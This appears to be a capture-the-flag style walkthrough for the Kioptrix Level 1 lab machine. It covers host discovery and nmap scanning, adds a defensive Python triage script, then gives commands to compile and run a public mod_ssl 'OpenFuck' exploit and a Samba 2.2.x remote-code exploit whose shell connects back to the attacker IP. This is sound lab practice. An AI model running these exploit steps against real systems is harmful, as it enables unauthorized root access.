Environment
Lab setup
One Kali attack machine
One Kioptrix_Level_1 target machine
Target notes
Target download: https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
The Kioptrix_Level_1 target has two vulnerabilities:
1. Apache 1.3.20
2. Samba 2.2.1a
Step 1: Discover the target
Use the netdiscover tool for host discovery on the local network.
About netdiscover: a dedicated layer-2 discovery tool with both active and passive discovery modes.
Command:
netdiscover -i eth0 -r 192.168.251.0/24
-i: interface, the network interface to monitor, e.g. eth0.
-r: range, the subnet to probe, e.g. 192.168.251.0/24 as in the command above.
Host discovery with nmap
Command:
nmap -sn 192.168.251.1-254
-sn: host discovery only, no port scan.
Step 2: Information gathering
Once you have a target host, the first thing to do is gather information about it, for example a port scan to learn which ports are open and which services they run.
In this example the target's IP address is 192.168.251.19 and the attacker's is 192.168.251.168.
Scan with nmap. Command:
nmap -sC -sV -v -p- -A 192.168.251.19
-sC: run the default NSE scripts
-sV: service version detection
-v: verbose output
-p-: scan all 65535 ports
-A: aggressive scan, including OS detection and service version detection
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-07 05:13 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 05:13
Completed NSE at 05:13, 0.00s elapsed
Initiating NSE at 05:13
Completed NSE at 05:13, 0.00s elapsed
Initiating NSE at 05:13
Completed NSE at 05:13, 0.00s elapsed
Initiating ARP Ping Scan at 05:13
Scanning 192.168.251.19 [1 port]
Completed ARP Ping Scan at 05:13, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:13
Completed Parallel DNS resolution of 1 host. at 05:13, 0.05s elapsed
Initiating SYN Stealth Scan at 05:13
Scanning bogon (192.168.251.19) [65535 ports]
Discovered open port 80/tcp on 192.168.251.19
Discovered open port 111/tcp on 192.168.251.19
Discovered open port 443/tcp on 192.168.251.19
Discovered open port 22/tcp on 192.168.251.19
Discovered open port 139/tcp on 192.168.251.19
Discovered open port 1024/tcp on 192.168.251.19
Completed SYN Stealth Scan at 05:13, 5.11s elapsed (65535 total ports)
Initiating Service scan at 05:13
Scanning 6 services on bogon (192.168.251.19)
Completed Service scan at 05:13, 11.02s elapsed (6 services on 1 host)
Initiating OS detection (try #1) against bogon (192.168.251.19)
NSE: Script scanning 192.168.251.19.
Initiating NSE at 05:13
Completed NSE at 05:13, 10.61s elapsed
Initiating NSE at 05:13
Completed NSE at 05:13, 0.07s elapsed
Initiating NSE at 05:13
Completed NSE at 05:13, 0.00s elapsed
Nmap scan report for bogon (192.168.251.19)
Host is up (0.00079s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
| Supported Methods: GET HEAD OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1024/tcp status
|_ 100024 1 1024/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: pMYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_ssl-date: 2024-09-07T09:15:40+00:00; +1m50s from scanner time.
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| http-methods:
|_ Supported Methods: GET HEAD POST
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-09-26T09:32:06
| Not valid after: 2010-09-26T09:32:06
| MD5: 78ce:5293:4723:e7fe:c28d:74ab:42d7:02f1
|_SHA-1: 9c42:91c3:bed2:a95b:983d:10ac:f766:ecb9:8766:1d33
|_http-title: 400 Bad Request
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:F7:19:CE (VMware)
Device type: general purpose|media device
Running: Linux 2.4.X, Roku embedded
OS CPE: cpe:/o:linux:linux_kernel:2.4 cpe:/h:roku:soundbridge_m1500
OS details: Linux 2.4.9 - 2.4.18 (likely embedded), Roku HD1500 media player
Uptime guess: 0.001 days (since Sat Sep 7 05:12:48 2024)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=191 (Good luck!)
IP ID Sequence Generation: All zeros
Host script results:
| nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| KIOPTRIX<00> Flags: <unique><active>
| KIOPTRIX<03> Flags: <unique><active>
| KIOPTRIX<20> Flags: <unique><active>
| MYGROUP<00> Flags: <group><active>
|_ MYGROUP<1e> Flags: <group><active>
|_clock-skew: 1m49s
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 0.79 ms bogon (192.168.251.19)
NSE: Script Post-scanning.
Initiating NSE at 05:13
Completed NSE at 05:13, 0.00s elapsed
Initiating NSE at 05:13
Completed NSE at 05:13, 0.00s elapsed
Initiating NSE at 05:13
Completed NSE at 05:13, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.95 seconds
Raw packets sent: 65555 (2.885MB) | Rcvd: 65551 (2.623MB)
The scan shows that the host exposes several common ports; ports 80 and 443 serve HTTP and HTTPS respectively. Browsing to the HTTP service on port 80 at http://192.168.251.19/ returns the default Apache test page.
In many cases a single IP hosts several sites, and the result can differ depending on whether you access it by port, by IP address, or by domain name.
Port 22: SSH remote login
Port 80: HTTP
Port 111: Sun RPC portmapper (rpcbind)
Port 139: connections to this port are attempts to reach the NetBIOS/SMB service
Port 443: HTTPS
Port 1024: the start of the dynamic port range; many programs do not care which port they use and ask the system for the next free one, which is allocated from 1024 upward (here nmap identified it as the RPC status service, program 100024).
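As an added example (not part of the original write-up), the following Python triage runs over constructed lines in the shape of the scan above and flags the legacy findings a defender would record from it: the Apache 1.3 and mod_ssl 2.8.4 banners, SSHv1 and SSLv2 support, and a Samba banner that hides its version. It also compares the Samba version obtained later with Metasploit against the 2.2.8 threshold the write-up cites, handling letter-suffixed releases such as 2.2.1a. The rule patterns and reason strings are assumptions chosen for illustration.

```python
import re

# Constructed sample input (not nmap's own output): service lines in the shape of the scan above.
SCAN_LINES = [
    "22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)",
    "|_sshv1: Server supports SSHv1",
    "80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)",
    "139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)",
    "443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b",
    "| sslv2:",
    "|   SSLv2 supported",
]

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")

# Banner patterns worth flagging, each with the reason a defender would record (assumed rules).
RULES = [
    (r"Apache(?: httpd)?/?\s*1\.3\.", "Apache 1.3 branch is end-of-life"),
    (r"mod_ssl/2\.8\.4\b", "mod_ssl 2.8.4 has a known remote buffer overflow"),
    (r"protocol 1\.99|Server supports SSHv1", "SSH server still negotiates SSHv1"),
    (r"SSLv2 supported", "SSLv2 enabled"),
    (r"\bSamba smbd\b(?!.*\d\.\d)", "Samba version not disclosed in banner; verify separately"),
]

def triage(lines):
    """Return sorted (port, reason) findings; NSE '|' lines attach to the last port seen."""
    findings = set()
    current = None
    for raw in lines:
        line = raw.strip()
        m = PORT_RE.match(line)
        if m:
            current = int(m.group(1))
        if current is None:
            continue  # preamble before the first port line
        for pattern, reason in RULES:
            if re.search(pattern, line):
                findings.add((current, reason))
    return sorted(findings)

def version_key(ver):
    """'2.2.1a' -> (2, 2, 1, 'a'); the letter suffix sorts after the bare release."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)([a-z]?)", ver)
    if not m:
        raise ValueError(f"unparseable version: {ver}")
    return tuple(int(x) for x in m.groups()[:3]) + (m.group(4),)

def samba_below_2_2_8(ver):
    """True when the reported Samba version predates 2.2.8, the fix the write-up cites."""
    return version_key(ver) < version_key("2.2.8")
```

Calling triage(SCAN_LINES) yields one finding per (port, reason) pair, so duplicate evidence for the same issue, such as the SSHv1 hint in both the banner and the NSE line, is reported once.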
Vulnerability lead 1: the Apache web server
According to the information gathered, the target's Apache is very old: version 1.3.20, released in 2001. The SSL module on port 443 is equally dated, mod_ssl/2.8.4. Searching Exploit Database with the keyword "mod_ssl" shows that mod_ssl/2.8.4 has a known remote buffer overflow.
Download the first (most recent) exploit listed. When you download it, read the comments in the code; they usually explain how to use or compile it.
Save the code locally as OpenFuck.c and compile it with:
gcc -o OpenFuck OpenFuck.c -lcrypto
As the code comments explain, if compilation fails, first install libssl-dev with apt-get install libssl-dev. A successful build produces an executable named "OpenFuck".
Running "./OpenFuck" with no arguments prints its usage.
The parameter to use depends on the target's operating system and Apache version. From the information gathered above, the target runs Red Hat Linux with Apache 1.3.20, and two parameters match that combination: 0x6a and 0x6b.
Run the following commands in turn:
./OpenFuck 0x6a 192.168.251.19 443
./OpenFuck 0x6b 192.168.251.19 443
0x6a got no response from the target, while 0x6b succeeded and obtained root privileges on the target.
Vulnerability lead 2: the Samba service
The nmap scan did not reveal the Samba version, so another method is needed to confirm it, for example Metasploit's version scanner. Start Metasploit by typing msfconsole in a terminal.
Enter search smb-version to find the scanner module dedicated to detecting the Samba version.
msfconsole
search smb-version
You can use "info <number>" (the value in the # column), "use <number>", or "use <value from the Name column>".
Check the required options with "show options".
use 0
show options
Of the options listed, RHOSTS is the only one we need to set.
set rhost 192.168.251.19
run
The output shows that the host's Samba version is 2.2.1a.
Searching Exploit Database for "Samba 2.2." returns a large number of exploits.
This example uses "Samba < 2.2.8 (Linux/BSD) - Remote Code Execution".
Download it and compile locally:
gcc 10.c -o smb
After compiling, run "./smb" with no arguments to display the usage help.
./smb
Build the command from what we already know and the usage help:
./smb -b 0 -c 192.168.251.168 192.168.251.19
With that, the Samba version vulnerability yields the highest privileges on the target.